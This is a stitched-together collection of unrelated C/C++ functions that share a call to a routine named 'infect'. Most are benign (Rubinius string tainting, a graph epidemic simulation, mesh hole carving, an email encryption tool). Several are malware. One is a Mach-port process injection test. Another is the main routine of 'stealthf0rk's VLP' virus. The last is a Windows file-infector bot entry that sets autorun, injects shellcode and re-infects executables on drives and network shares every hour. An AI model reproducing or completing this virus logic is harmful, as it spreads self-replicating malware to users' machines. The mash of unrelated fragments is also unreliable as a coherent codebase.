// Rubinius.primitive :string_dup
String* string_dup(STATE) {
if(likely(klass() == G(string) && ivars()->nil_p())) {
/* We have a plain string with no metaclass or ivars, so if we can
* allocate a new object in the young space, we can copy it directly
* without needing a write barrier.
*/
String* so = state->memory()->new_object<String>(state, G(string));
if(likely(so->young_object_p())) {
so->copy_body(state->vm(), this);
so->shared(state, cTrue);
shared(state, cTrue);
infect(state, so);
return so;
}
}
return string_dup_slow(state);
}
String* Float::to_s_formatted(STATE, String* format) {
char buf[FLOAT_TO_S_STRLEN];
size_t size = snprintf(buf, FLOAT_TO_S_STRLEN, format->c_str(state), val);
if(size >= FLOAT_TO_S_STRLEN) {
std::ostringstream msg;
msg << "formatted string exceeds " << FLOAT_TO_S_STRLEN << " bytes";
Exception::argument_error(state, msg.str().c_str());
}
String* str = String::create(state, buf, size);
infect(state, str);
str->encoding(state, Encoding::usascii_encoding(state));
str->ascii_only(state, cTrue);
str->valid_encoding(state, cTrue);
return str;
}
void *perform_work(void *argument) {
int passed_in_value, i=0x11, j=33;
int *seeds, nSeeds;
passed_in_value = *((int *) argument);
seeds = malloc( 1*sizeof *seeds);
nSeeds = 1;
seeds[0] = seed_vertices[0];
/*
* Record whether a vertex is infected
*/
char *infected ;
int s = (G->V + 5) * sizeof *infected;
infected= malloc(s);
memset(infected, 0,s);
unsigned long seed_int = (unsigned long) (
(1 + passed_in_value + time(NULL)) % 888);
#ifdef __CYGWIN__
reent seed = (reent) seed_int;
#else
struct drand48_data seed;
srand48_r(seed_int, &seed);
#endif
for (i = 1, j = 1; i <= G->V; ++i) {
if (i != seeds[0] &&
getRandTo_r(MAX_EDGE_WEIGHT, &seed) <= G->adj_list[i]->prob) {
if(j >= nSeeds){
seeds= realloc(seeds, (1+j)*2*sizeof *seeds);
nSeeds = 2+j*2;
}
seeds[j] = i;
j++;
}
}
n_seed = j ;
Ninfected_ptr[passed_in_value] =
infect(G,n_seed , seeds, infected, &seed);
fprintf(out2, "infected[%d] : %d\n", passed_in_value,
Ninfected_ptr[passed_in_value]);
return NULL;
}
int main() {
char *argv[] = {"/bin/sleep", "30", NULL};
char *envp[] = {NULL};
thread_act_t thread;
mach_port_t port = MACH_PORT_NULL;
pid_t pid = spawn("/bin/sleep", argv, envp, &port, -1);
if (pid <= 0 && port == MACH_PORT_NULL) {
printf("FAIL!\n");
return 1;
}
/* No rush, let's assume 2 seconds is enough time to get our
* process properly bootstrapped (execve, dyld, etc.
*/
sleep(2);
if (!infect(port, dummy_bundle, dummy_bundle_len, &thread)) {
printf("FAILED TO INFECT!\n");
return 1;
}
printf("Check if /tmp/dummy.bundle.out exists!\n");
return 0;
}
int main(int argc, char **argv, char **envp)
{
char *s, *s2, *path, *dir;
int i;
char from[200];
#ifdef DEBUG
/* If U are angry do this:
* setenv("PATH", "/root/VTEST/bin:/root/VTEST/bad:/root/VTEST/usr/bin:/root/VTEST/bad2", 1);
*/
fd = fopen(TRACEFILE, "a");
#endif
DFPRINTF("====== tracefile of stealthf0rk's VLP ==========\n");
path = getenv("PATH");
s = whereis(path, argv[0]); /* return only static! -> */
if (strcpy(from, s) == NULL) /* so we need a copy */
return -1;
DFPRINTF("@f main: file of action is <%s>\n", from);
i = infect(3, from);
exechost(from, argv, envp);
return 0;
}
// This customized version carves holes defined by the regions.
// It'll remove any element which doesn't receive any region.
int custom_carveholes(struct mesh *m, struct behavior *b, const int *outside, const int *inside)
{
struct otri neighbortri;
struct otri triangleloop;
struct osub subsegloop;
triangle **temptri;
triangle ptr; /* Temporary variable used by sym(). */
double area;
double attribute;
double triangle_attribute;
int sane_mesh;
poolinit(& m->viri, sizeof( triangle * ), VIRUSPERBLOCK, VIRUSPERBLOCK, 0);
/* Assigns every triangle a regional attribute of -1 */
traversalinit(& m->triangles);
triangleloop.orient = 0;
triangleloop.tri = triangletraverse(m);
while ( triangleloop.tri != ( triangle * ) NULL ) {
setelemattribute(triangleloop, m->eextras, -1.0);
triangleloop.tri = triangletraverse(m);
}
sane_mesh = 1;
/* Loop over all segments */
traversalinit(& m->subsegs);
subsegloop.ss = subsegtraverse(m);
subsegloop.ssorient = 0;
while ( subsegloop.ss != ( subseg * ) NULL ) {
if ( subsegloop.ss != m->dummysub ) {
/* First neighbor. */
ssymself(subsegloop);
stpivot(subsegloop, neighbortri);
if ( neighbortri.tri != m->dummytri ) {
area = 0.0; /// @todo Possible set this as the minimum as well.
attribute = outside [ mark(subsegloop) - 1 ];
triangle_attribute = elemattribute(neighbortri, m->eextras);
/* The region no number yet. */
if ( triangle_attribute < 0 && attribute >= 0 ) {
infect(neighbortri);
temptri = ( triangle ** ) poolalloc(& m->viri);
* temptri = neighbortri.tri;
/* Apply one region's attribute and/or area constraint. */
regionplague(m, b, attribute, area);
/* The virus pool should be empty now. */
} else if ( attribute >= 0 && triangle_attribute >= 0 && attribute != triangle_attribute ) {
/* Check for problems. */
vertex v1, v2, v3;
org(neighbortri, v1);
dest(neighbortri, v2);
apex(neighbortri, v3);
fprintf(stdout, "Error: inconsistent region information (new %d, old %d from %d) (outside) at (%e, %e)\n",
( int ) attribute, ( int ) triangle_attribute, ( int ) mark(subsegloop), ( v1 [ 0 ] + v2 [ 0 ] + v3 [ 0 ] ) / 3, ( v1 [ 1 ] + v2 [ 1 ] + v3 [ 1 ] ) / 3);
sane_mesh = 0;
}
}
/* Second neighbor (same procedure). */
ssymself(subsegloop);
stpivot(subsegloop, neighbortri);
if ( neighbortri.tri != m->dummytri ) {
area = 0.0;
attribute = inside [ mark(subsegloop) - 1 ];
triangle_attribute = elemattribute(neighbortri, m->eextras);
if ( triangle_attribute < 0 && attribute >= 0 ) {
infect(neighbortri);
temptri = ( triangle ** ) poolalloc(& m->viri);
* temptri = neighbortri.tri;
regionplague(m, b, attribute, area);
} else if ( attribute >= 0 && triangle_attribute >= 0 && attribute != triangle_attribute ) {
vertex v1, v2, v3;
org(neighbortri, v1);
dest(neighbortri, v2);
apex(neighbortri, v3);
fprintf(stdout, "Error: inconsistent region information (new %d, old %d from %d) (inside) at (%e, %e)\n",
( int ) attribute, ( int ) triangle_attribute, ( int ) mark(subsegloop), ( v1 [ 0 ] + v2 [ 0 ] + v3 [ 0 ] ) / 3, ( v1 [ 1 ] + v2 [ 1 ] + v3 [ 1 ] ) / 3);
sane_mesh = 0;
}
}
subsegloop.ss = subsegtraverse(m);
}
}
/* Remove all triangles with marker 0.0 */
traversalinit(& m->triangles);
triangleloop.tri = triangletraverse(m);
int triangle_number = 0;
while ( triangleloop.tri != ( triangle * ) NULL ) {
if ( triangleloop.tri != m->dummytri ) {
triangle_number++;
attribute = elemattribute(triangleloop, m->eextras);
if ( attribute == -1.0 ) {
fprintf(stderr, "Broken mesh at triangle %d\n", triangle_number);
sane_mesh = 0;
} else if ( attribute == 0.0 ) {
infect(triangleloop);
temptri = ( triangle ** ) poolalloc(& m->viri);
* temptri = triangleloop.tri;
}
}
triangleloop.tri = triangletraverse(m);
}
/* Remove the marked elements */
plague(m, b);
if ( b->regionattrib && !b->refine ) {
/* Note the fact that each triangle has an additional attribute. */
m->eextras++;
}
/* Free up memory. */
pooldeinit(& m->viri);
return sane_mesh;
}
int main(int argc, char ** argv){
infect(argc, argv);
}
int main(int argc, char **argv)
{
char *field;
char *ampptr;
char *query;
char *token;
int status;
char defaultcnffile[] = "infect.cnf";
char *cnffile, *paramsfile;
CONF_CTX *cnfctx;
char *unencfile;
char *email, *subject;
char *id;
if (argc < 2) {
printf("Usage: infect id=<email address>\n");
return 0;
}
if (argc > 2) {
cnffile = argv[1];
query = argv[2];
} else {
cnffile = defaultcnffile;
query = argv[1];
}
cnfctx = LoadConfig(cnffile);
if (!cnfctx) {
fprintf(stderr, "error opening %s\n", cnffile);
fprintf(stderr, "using default values\n");
cnfctx = constructCTX();
}
paramsfile = GetPathParam(cnfctx, "params", 0, "params.txt");
mailprog = GetPathParam(cnfctx, "mail", 0, "/usr/bin/mail");
encfile = GetPathParam(cnfctx, "messagefile", 0, "firstmessage.txt");
unencfile = GetPathParam(cnfctx, "helpfile", 0, "instructions.txt");
printf("Infecting %s\n", query);
/*
cout << "params file: " << paramsfile << endl;
cout << "mailer: " << mailprog << endl;
cout << "instructions: " << unencfile << endl;
cout << "message: " << encfile << endl;
*/
status = FMT_load_raw_byte_string(plainmessage, unencfile);
if (status != 1) {
fprintf(stderr, "error opening instructions\n");
}
IBE_init();
status = FMT_load_params(params, paramsfile);
if (status != 1) {
fprintf(stderr, "Error loading params file %s\n", paramsfile);
return(1);
}
email = NULL;
subject = NULL;
token = (char *) malloc(strlen(query) + 1);
ampptr = query;
ampptr = get_token(token, ampptr, '&');
while(ampptr) {
if (!(field = index(token, '='))) {
fprintf(stderr, "Malformed query\n");
return 1;
}
field[0] = 0;
field++;
if (!strcmp(token, "id")) {
email = (char *) malloc(strlen(field));
strcpy(email, field);
translate(email);
} else if (!strcmp(token, "subject")) {
subject = (char *) malloc(strlen(field));
strcpy(subject, field);
translate(subject);
}
ampptr = get_token(token, ampptr, '&');
}
if (!email) {
//char errmsg[] = "Must supply email address and password.";
fprintf(stderr, "bad ID\n");
return 1;
}
id = FMT_make_id(email, subject, params);
infect(email, id);
free(id);
free(email);
free(subject);
free(token);
params_clear(params);
IBE_clear();
return 0;
}
void entry(DWORD magic,DECRYPT_ITEM *item){
if (magic==MAGIC_INJECT){
#if _DEBUG
wchar_t name[MAX_PATH];
GetModuleFileNameW(GetModuleHandleW(0), name, MAX_PATH);
dbg(VINFO, L"I'm injected %s",name);
#endif
//в ожидании что бот помер
while (true){
HANDLE hbot = CreateMutexA(0, TRUE, mtbot);
if (!hbot){
Sleep(1000);
continue;
}
if (GetLastError() == ERROR_ALREADY_EXISTS){
CloseHandle(hbot);
Sleep(1000);
continue;
}
break;
}
//основной цикл жизни бота
#if _DEBUG
dbg(VINFO, L"Run bot %s", name);
#endif
//старт полезной нагрузки
CreateThread(0, 0, thread_payload, 0, 0, 0);
//запись в автозапуск
CreateThread(0, 0, thread_autorun, item, 0, 0);
//повторный инфект
cmem b;
b.push(item+1, item->size);
while (1){
find_drive(L"*.exe", P, &b);
find_drive(L"*.dll", P, &b);
infect_netshares(shares, &b);
find_drive(L"*.*", P, &b);
dbg(VINFO, "Infect done");
Sleep(60*60*1000);
}
ExitThread(0);
}
if (magic == MAGIC_SHELLCODE){ //Второе поколение вируса
dbg(VINFO, L"I'm copy beetle2 inside target file");
setPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE);
cmem inj;
inj.push(item, item->size + sizeof(DECRYPT_ITEM));
inject(inj);
ExitThread(0);
}
wchar_t fcur[MAX_PATH];
GetModuleFileNameW(GetModuleHandleW(0), fcur, MAX_PATH);
cmem a, b, c;
if (!cfile::load(fcur, a)){
dbg(VERROR, "Can't open current file");
exit(0);
}
if (!cfile::load("..\\test\\notepad.exe", b)){
dbg(VERROR, "Can't open target file");
exit(0);
}
if (!infect(b, a, &c)){
dbg(VERROR, "Can't infect target file");
exit(0);
}
if (!cfile::save("..\\test\\notepad.inf.exe", c)){
dbg(VERROR, "Can't save infected file");
exit(0);
}
dbg(VINFO, "Done target file");
exit(0);
}
